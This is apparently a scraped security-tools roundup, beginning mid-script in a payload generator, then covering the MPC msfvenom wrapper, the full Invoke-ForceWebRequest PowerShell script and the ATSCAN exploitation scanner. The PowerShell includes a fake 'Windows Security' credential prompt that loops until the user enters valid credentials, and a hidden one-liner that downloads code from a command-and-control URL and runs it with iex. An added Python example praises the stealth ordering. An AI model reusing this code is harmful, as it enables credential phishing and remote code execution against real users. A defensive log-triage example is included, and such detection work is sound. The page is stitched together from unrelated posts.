			print yellowtxt("[!] You need to create this default path")
			sys.exit(1)
			#os.mkdir(output_dir)
			#os.chdir(output_dir)
			#os.mkdir('handlers')

	if args.veil:
		if not ip:
			print "[!] IP address required with this payload option :: --veil --ip <Address>"
		else:
			print yellowtxt("[!] Encoding Veil payloads")
			veil_payloads(ip ,output_dir, move_payloads, veil_script)


	if args.msf:
		if not ip:
			print "[!] IP address required with this payload option :: --msf --ip <Address>"
		else:
			print yellowtxt("[!] Encoding MSF Payloads")
			msf_payloads(ip, output_dir)


	if args.php:
		if not ip:
			print "[!] IP address required with this payload option :: --php --ip <Address>"
		else:
			print yellowtxt("[!] Encoding PHP Payloads")
			php_payloads(ip, output_dir)



	if args.clean:
		if args.output:
			output_dir = get_payload_output(output)
			print redtxt("Cleaning out Payload and Handler File directories in : ") + yellowtxt(output_dir)
			clean(output_dir, veil_script)
		else:
			payload_paths = ["/root/payloads/windows/","/root/payloads/windows/handlers/"]
			print redtxt("Cleaning out Payload and Handler File directories")
			for payload_path in payload_paths:
				clean(payload_path, veil_script)


if __name__ == "__main__":
	Main()

Source: https://github.com/lorentzenman | Our Post Before

Msfvenom Payload Creator (MPC) v-1.4.3.

Changelog v1.4.3:
+ mpc.sh: Removes the use of IPv6 in the IP selection menu, as it is not yet supported.

Msfvenom Payload Creator (MPC) is a wrapper that generates multiple types of payloads based on the user's choice. The idea is to be as simple as possible (only requiring one input) to produce a payload.

Fully automating msfvenom & Metasploit is the end goal (as well as being able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and the ability to enter any argument in any order, in various formats/patterns).

The only necessary input from the user should be defining the payload they want, by either the platform (e.g. windows) or the file extension they wish the payload to have (e.g. exe).
+ Can't remember your IP for an interface? Don't sweat it, just use the interface name: eth0.
+ Don't know what your external IP is? MPC will discover it: wan.
+ Want to generate one of each payload? No issue! Try: loop.
+ Want to mass create payloads? Everything? Or to filter your selection? Either way, it's not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.
Install
+ Designed for Kali Linux v2.x & Metasploit v4.11+.
+ Kali v1.x should work.
+ OSX 10.11+ should work.
+ Ubuntu 12-15 & Metasploit Should work.
+ Weakerth4n 6+ should work.
+ …nothing else has been tested.

Installation using git:

git clone https://github.com/g0tmi1k/mpc && cd mpc
./mpc.sh

Update:
cd mpc
git pull

Download : v1.4.3.zip  | v1.4.3.tar.gz
Source : https://github.com/g0tmi1k
Our Post Before : http://seclist.us/msfvenom-payload-creator-mpc-v-1-4-2.html

PowerShell force HTTP GET in a computer with internet config & phishing the user for a valid proxy credentials.

Force an HTTP GET on a computer with an unknown internet configuration: first try to download the URL directly; if that fails, use the default proxy credentials and the .pac proxy list. If none of them works, it tricks the user into entering their credentials via the Windows default credential prompt.
Description:
Normally this script is used in a pentest environment, when you are running code on a target computer where you do not know exactly what the outbound internet configuration is. Internally, Invoke-ForceWebRequest uses two other functions:
+ Invoke-BasicWebRequest: another function written by the author which creates an HTTP web request with proxy configuration. Similar (but very basic) to the native Invoke-WebRequest PowerShell cmdlet, which is only available on PowerShell v3+.
+ Invoke-LoginPrompt: an improved version of the function of the same name written by @enigma0x3.
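The part of this design worth copying is that a 200 response is not treated as success on its own: captive portals and some corporate proxies answer every request with 200 and a block page, so the script also checks for a marker string it knows is in the real payload. The Python below is an added example, not the Invoke-ForceWebRequest script itself, of the same "try each egress path, then validate the body" logic, with the HTTP fetchers injected so it runs offline. The four strategy names mirror the script's order; the fetchers and the fake block page are constructed for the example.

```python
# Added example (not Invoke-ForceWebRequest itself): fallback chain over egress
# strategies, accepting a response only when status is 200 AND the body holds
# a known marker.  Fetchers below are constructed stand-ins for real ones.


def force_web_request(url, strategies, dummy_string="dummystring", log=None):
    """Try each (name, fetch) pair in order.

    fetch(url) must return (status_code, body_text) or raise on failure.
    Returns (name, status, body) for the first strategy whose response is
    HTTP 200 and whose body contains dummy_string; None if all fail.
    """
    for name, fetch in strategies:
        if log is not None:
            log.append("trying %s" % name)
        try:
            status, body = fetch(url)
        except Exception as exc:  # connection refused, auth failure, no PAC, ...
            if log is not None:
                log.append("%s failed: %s" % (name, exc))
            continue
        if status == 200 and dummy_string in body:
            return name, status, body
        if log is not None:
            log.append("%s returned %d but body failed the marker check" % (name, status))
    return None


# --- constructed fetchers standing in for the real egress paths -------------

def direct(url):
    raise IOError("connection refused (egress filtered)")


def default_proxy(url):
    # A proxy that "succeeds" but serves a block page: status alone would fool us.
    return 200, "<html><title>Access denied by proxy</title></html>"


def pac_proxy(url):
    return 407, "Proxy Authentication Required"


def prompted_creds(url):
    # After the user hands over credentials, the real payload comes back.
    return 200, "function Invoke-Payload { dummystring }"


STRATEGIES = [
    ("direct", direct),
    ("default proxy credentials", default_proxy),
    ("pac proxy", pac_proxy),
    ("prompted credentials", prompted_creds),
]

if __name__ == "__main__":
    trace = []
    print(force_web_request("http://c2.example/payload.txt", STRATEGIES, log=trace))
    print("\n".join(trace))
```

The ordering matters for stealth as much as for success: the credential prompt is the noisiest step, so it is tried last, only after every silent path has been exhausted.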

usage:

Example
PS C:\> Invoke-ForceWebRequest google.com -DummyString html -Verbose
VERBOSE: Trying http get with method #1: simple request...

StatusCode Content
---------- -------
       200 <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="es"><head><meta content="IE=edge" http-equiv="X-UA-Co...

Script:

#requires -version 2
function Invoke-ForceWebRequest {
    <#
    .SYNOPSIS
        Force an HTTP GET on a computer with an unknown internet config: try to download the URL directly and, if that fails, use default proxy credentials and the .pac proxy list. If none of them works, trick the user and request their credentials using the Windows default credential prompt.
    .PARAMETER URL
        [String], required=true, ValueFromPipeline=true
        URL to download. e.g.: comandandcontrol.com/payload.txt
    .PARAMETER DummyURL
        [String], required=false
        URL to download with some DummyString you know is in there.
        If you leave it empty, URL parameter will be used as DummyURL. So be sure you use a DummyString that you're for sure is in URL.
    .PARAMETER DummyString
        [String], required=false
        String that will be checked for in the DummyURL response. We do that because sometimes proxies return 200 OK for every requested site but with fake content.
        E.g.: use the name of a function you know is in DummyURL.
        By default, DummyString is 'dummystring', so you could include that string in your malicious function in DummyURL.
    .OUTPUTS
        [PSObject]
        StatusCode Content
        ---------- -------
              200  <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="es"><head><meta content="IE=edge" http-equiv="X-UA-Co...
    .EXAMPLE
        PS C:\> . .\Invoke-ForceWebRequest.ps1
        PS C:\> Invoke-ForceWebRequest google.com -DummyString html -Verbose
        VERBOSE: Trying http get with method #1: simple request...
        StatusCode Content
        ---------- -------
               200 <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="es"><head><meta content="IE=edge" http-equiv="X-UA-Co...
    .EXAMPLE
        From a red-team point of view, running this code on a target machine:
        (assuming you wrote the script in the target computer to $env:temp folder)
        C:\> powershell.exe -ep bypass -windowstyle hidden -nop -noexit -c "gc $env:temp\Invoke-ForceWebRequest.ps1 | out-string | iex; Invoke-ForceWebRequest comandandcontrol.com/payload.txt -DummyString someCode | % { if ($_.StatusCode -eq 200) { $_.Content | out-string | iex } }"
            1: it will download code from URL comandandcontrol.com/payload.txt
            2: then it will check if the content of payload.txt is correct by checking a dummy-string that you know is inside payload.txt
            3: invoke (run) code of payload.txt (if you're a redteamer it will be some malicious code)
    .LINK
        https://github.com/daniel0x00/forcewebrequest
        https://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1 by @enigma0x3
    #>
    [CmdletBinding()]
    [OutputType([psobject])]
    param(
        [Parameter(Mandatory=$true,
                   ValueFromPipeline=$true,
                   Position=0)]
        [String]
        $URL,

        [Parameter(Mandatory=$false)]
        [String]
        $DummyURL,

        [Parameter(Mandatory=$false)]
        [String]
        $DummyString = 'dummystring'
    )
    begin {
        # Modified version of 'Invoke-LoginPrompt' by @enigma0x3
        # https://github.com/enigma0x3/Invoke-LoginPrompt/blob/master/Invoke-LoginPrompt.ps1
        function Invoke-LoginPrompt {
            do {
                $cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
                $username = "$env:username"
                $domain = "$env:userdomain"
                $full = "$domain" + "\" + "$username"
                $password = $cred.GetNetworkCredential().password
                Add-Type -assemblyname System.DirectoryServices.AccountManagement
                $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
                $continue = $true
                try { if ($DS.ValidateCredentials("$full", "$password") -eq $true) { $continue = $false } } 
                catch { $continue = $false }
            } while ($continue -eq $true);
            
            $output = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
            $output
        }

        # Invoke-BasicWebRequest by @daniel0x00
        #
        function Invoke-BasicWebRequest {
            [CmdletBinding()]
            [OutputType([psobject])]
            param(
                [Parameter(Mandatory=$true,
                        ValueFromPipeline=$true,
                        Position=0)]
                [ValidateNotNullOrEmpty()]
                [String]
                $URL,

                [Parameter(Mandatory=$false)]
                [String]
                $UserAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko',

                [Parameter(Mandatory=$false)]
                [String]
                $ProxyURL,

                [Parameter(Mandatory=$false)]
                [String]
                $ProxyUser,

                [Parameter(Mandatory=$false)]
                [String]
                $ProxyPassword,

                [Parameter(Mandatory=$false)]
                [Switch]
                $ProxyDefaultCredentials
            )

            # Ensure URLs contain at least an 'http' protocol:
            if (-not ($URL -match "http")) { $URL = 'http://'+$URL }
            if (($ProxyURL) -and (-not ($ProxyURL -match "http"))) { $ProxyURL = 'http://'+$ProxyURL }

            $request = [System.Net.WebRequest]::Create($URL)
            $request.UserAgent = $UserAgent
            $request.Accept = "*/*"

            # Proxy settings
            if ($ProxyURL) { 
                $proxy = New-Object System.Net.WebProxy
                $proxy.Address = $ProxyURL
                $request.Proxy = $proxy

                if ($ProxyUser) {
                    if ($ProxyDefaultCredentials) {
                        $request.UseDefaultCredentials = $true
                    }
                    else {
                        $secure_password    = ConvertTo-SecureString $ProxyPassword -AsPlainText -Force;
                        $proxy.Credentials  = New-Object System.Management.Automation.PSCredential ($ProxyUser, $secure_password);
                    }
                }
            }

            try {
                $response               = $request.GetResponse()
                $response_stream        = $response.GetResponseStream();
                $response_stream_reader = New-Object System.IO.StreamReader $response_stream;
                $response_text          = $response_stream_reader.ReadToEnd(); 
                $response_status_code   = ($response.StatusCode) -as [int]

                $out = New-Object -TypeName PSObject
                $out | Add-Member -MemberType NoteProperty -Name StatusCode -Value $response_status_code
                $out | Add-Member -MemberType NoteProperty -Name Content -Value $response_text
                $out
            }
            catch {
                $response = $_.Exception.InnerException
                $response_status_code = [int](([regex]::Match($_.Exception.InnerException,"\((?<status_code>\d{3})\)")).groups["status_code"].value)

                $out = New-Object -TypeName PSObject
                $out | Add-Member -MemberType NoteProperty -Name StatusCode -Value $response_status_code
                $out | Add-Member -MemberType NoteProperty -Name Content -Value $response
                $out
            }
        }
    }
    process {
        # Ensure URLs contain at least an 'http' protocol:
        if (-not ($URL -match "http")) { $URL = 'http://'+$URL }
        if (!$DummyURL) { $DummyURL = $URL }
        if (-not ($DummyURL -match "http")) { $DummyURL = 'http://'+$DummyURL }

        # 1: no-proxy webrequest
        Write-Verbose "Trying http get with method #1: simple request..."
        $request = Invoke-BasicWebRequest $DummyURL
        if ($request | select -first 1 | % { $_.content -match $DummyString }) { 
            $request = Invoke-BasicWebRequest $URL
            return
        }

        # getting basic proxy settings
        $proxy_settings     = Get-ItemProperty 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
        $proxy_server       = $proxy_settings | % { $_.ProxyServer }
        $proxy_auto_url     = $proxy_settings | % { $_.AutoConfigURL }
        $proxy_pac_regex    = "PROXY\s+(?<proxy>[A-Za-z0-9\.\-\_]+\:\d{1,5})"

        # 2: basic-server webrequest
        Write-Verbose "Trying http get with method #2: request with just URL proxy ($proxy_server)..."
        $request = Invoke-BasicWebRequest $DummyURL -ProxyURL $proxy_server -ProxyDefaultCredentials
        if ($request | select -first 1 | % { $_.content -match $DummyString }) {
            $request = Invoke-BasicWebRequest $URL -ProxyURL $proxy_server -ProxyDefaultCredentials
            return
        }

        # 3: .pac webrequest
        if ($proxy_auto_url -ne $null) {
            $proxy_pac_config   = (New-Object System.Net.WebClient).DownloadString($proxy_auto_url)
            
            if ($proxy_pac_config -ne $null) {
                # iterate through each proxy url match:
                $proxy_pac_config | Select-String $proxy_pac_regex -AllMatches | % { $_.Matches } | % { 
                    # request dummystring for each proxy-url
                    $proxy_server_pac = $_.Groups["proxy"].Value

                    Write-Verbose "Trying http get with method #3: request with just URL proxy from .pac file ($proxy_server_pac)..."
                    $request = Invoke-BasicWebRequest $DummyURL -ProxyURL $proxy_server_pac
                    if ($request | select -first 1 | % { $_.content -match $DummyString }) {
                        $request = Invoke-BasicWebRequest $URL -ProxyURL $proxy_server_pac
                        return
                    }
                }
            }
        }

        # 4: at this point, we need to trick the user with a fake credential request.
        #    the credential window will be the Windows original one, so user should not suspect of a malicious activity.
        #    user will be prompted until he/she writes a valid credential.
        Invoke-LoginPrompt | ForEach-Object {
            $username   = $_.UserName
            $password   = $_.Password
            Write-Verbose "We have the credentials of $username user!"

            # 4.1: request with the default proxy URL and credentials.
            Write-Verbose "Trying http get with method #4.1: request with URL proxy ($proxy_server) and $username credential..."
            $request = Invoke-BasicWebRequest $DummyURL -ProxyURL $proxy_server -ProxyUser $username -ProxyPassword $password
            if ($request | select -first 1 | % { $_.content -match $DummyString }) {
                $request = Invoke-BasicWebRequest $URL -ProxyURL $proxy_server -ProxyUser $username -ProxyPassword $password
                return
            }

            # 4.2: request with the .pac proxy URLs and credentials.
            if ($proxy_auto_url -ne $null) {
                $proxy_pac_config   = (New-Object System.Net.WebClient).DownloadString($proxy_auto_url)
                
                if ($proxy_pac_config -ne $null) {
                    # iterate through each proxy url match:
                    $proxy_pac_config | Select-String $proxy_pac_regex -AllMatches | % { $_.Matches } | % { 
                        # request dummystring for each proxy-url
                        $proxy_server_pac = $_.Groups["proxy"].Value

                        Write-Verbose "Trying http get with method #4.2: request with URL proxy from .pac file ($proxy_server_pac) and $username credential..."
                        $request = Invoke-BasicWebRequest $DummyURL -ProxyURL $proxy_server_pac -ProxyUser $username -ProxyPassword $password
                        if ($request | select -first 1 | % { $_.content -match $DummyString }) {
                            $request = Invoke-BasicWebRequest $URL -ProxyURL $proxy_server_pac -ProxyUser $username -ProxyPassword $password
                            return
                        }
                    }
                }
            }
        }
    }
    end { $request }
}
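As an added defender-side example (not part of the forcewebrequest project): a small triage over PowerShell script block log entries (Event ID 4104) that flags the strings the script above relies on, namely the "Windows Security" PromptForCredential loop with ValidateCredentials, the proxy registry read, and a download-then-iex chain. The sample events and the indicator weights are constructed assumptions for illustration.

```python
import re

# Indicator strings taken from the Invoke-ForceWebRequest / Invoke-LoginPrompt
# listing above. Weights are assumptions chosen for this example, not a
# published scoring scheme.
INDICATORS = [
    ("fake_windows_security_prompt",
     re.compile(r'PromptForCredential\(\s*"Windows Security"', re.I), 3),
    ("credential_validation_loop", re.compile(r'ValidateCredentials\(', re.I), 2),
    ("account_management_assembly",
     re.compile(r'System\.DirectoryServices\.AccountManagement', re.I), 1),
    ("proxy_registry_read", re.compile(r'Internet Settings', re.I), 1),
    ("pac_autoconfig_read", re.compile(r'AutoConfigURL', re.I), 1),
    ("download_then_iex", re.compile(r'(DownloadString|\.Content)\b.*\biex\b', re.I), 2),
]

SCRIPT_BLOCK_EVENT_ID = 4104  # Microsoft-Windows-PowerShell/Operational script block logging


def score_script_block(text):
    """Return (score, [matched indicator names]) for one logged script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def triage(events, threshold=4):
    """events: iterable of (event_id, script_text) tuples, e.g. parsed from an
    exported event log. Returns [(index, score, hits)] for blocks scoring at or
    above the threshold; events other than 4104 are ignored."""
    flagged = []
    for i, (event_id, text) in enumerate(events):
        if event_id != SCRIPT_BLOCK_EVENT_ID:
            continue
        score, hits = score_script_block(text)
        if score >= threshold:
            flagged.append((i, score, hits))
    return flagged


# Constructed sample events for demonstration (not real log data).
SAMPLE_EVENTS = [
    (4104, 'Get-ChildItem C:\\Users | Select-Object Name'),
    (4104, '$cred = $Host.ui.PromptForCredential("Windows Security", '
           '"Invalid Credentials, Please try again", "$env:userdomain\\$env:username",""); '
           'Add-Type -assemblyname System.DirectoryServices.AccountManagement; '
           'if ($DS.ValidateCredentials("$full", "$password") -eq $true) { $continue = $false }'),
    (4104, '$proxy_settings = Get-ItemProperty '
           '"Registry::HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"'),
    (4103, 'PromptForCredential("Windows Security", "x", "y", "")'),  # module log, not a script block
]

if __name__ == "__main__":
    for index, score, hits in triage(SAMPLE_EVENTS):
        print(f"event {index}: score {score}, indicators {hits}")
```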


Download: forcewebrequest.zip
Source: https://github.com/daniel0x00

ATSCAN v9.6 stable – perl script for Search / Server / Site / Dork / Exploitation Scanner.


Changelog v9.6:
– Use proxy in ports scans.
– Fix get subdomains.
– Wide search engine and more results when using proxy.
– Fix some text errors.
– Show proxy info when used.
– Removed text from panel info code.

ATSCAN-v9-6

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libraries to install:
apt-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works on Linux platforms. Best run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, CentOS; if you use Windows you can download manually.

Examples:
Simple search:
Search: --dork [dork] --level [level]
Search + get ip: --dork [dork] --level [level] --ip
Search + get ip + server: --dork [dork] --level [level] --ip --server
Search with many dorks: --dork [dork1,dork2,dork3] --level [level]
Search + get ip+server: --dork [dorks.txt] --level [level]
Search + set save file: --dork [dorks.txt] --level [level] --save myfile.txt
Search + Replace + Exploit: --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]

Subscan from Search Engine:
Search + Exploitation: --dork [dork] --level [10] --xss/--lfi/--wp ...
Search + Server Exploitation: -t [ip] --level [10] --xss/--lfi/--wp ...
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss/--lfi/--wp ...

Validation:
Search + Exploit + Validation: --dork [dork] --level [10] --exp --isup/--valid [string]
Search + Server Exploit + Validation: -t [ip] --level [10] --exp --isup/--valid [string]
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --isup/--valid [string]

Use List / Target:
-t [target/targets.txt] --exp --isup/--valid [string]
-t [target/targets.txt] --xss/--lfi ...

Server:
Get Server sites: -t [ip] --level [value] --sites
Get Server wordpress sites: -t [ip] --level [value] --wp
Get Server joomla sites: -t [ip] --level [value] --joom
Get Server upload sites: -t [ip] --level [value] --upload
Get Server zip sites files: -t [ip] --level [value] --zip
WP Arbitrary File Download: -t [ip] --level [value] --wpadf
Joomla RFI: -t [ip] --level [1] --joomfri --shell [shell link]
Scan basic tcp (quick): -t [ip] --ports --basic tcp
Scan basic udp (quick): -t [ip] --ports --basic udp
Scan basic udp+tcp: -t [ip] --ports --basic udp+tcp
Scan complete tcp: -t [ip] --ports --all tcp
Scan complete udp: -t [ip] --ports --all udp
Scan complete udp+tcp: -t [ip] --ports --all udp+tcp
Scan range tcp: -t [ip] --ports --select tcp --start [value] --end [value]
Scan range udp: -t [ip] --ports --select udp --start [value] --end [value]
Scan range udp + tcp: -t [ip] --ports --select udp+tcp --start [value] --end [value]

Encode / Decode:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

External Command:
--dork [dork/dorks.txt] --level [level] --command "curl -v --TARGET"
--dork [dork/dorks.txt] --level [level] --command "curl -v --FULL_TARGET"
-t [target/targets.txt] --level [level] --command "curl -v --TARGET"
-t [target/targets.txt] --command "curl -v --FULL_TARGET"

Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before Download: v9.6.zip | v9.6.tar.gz
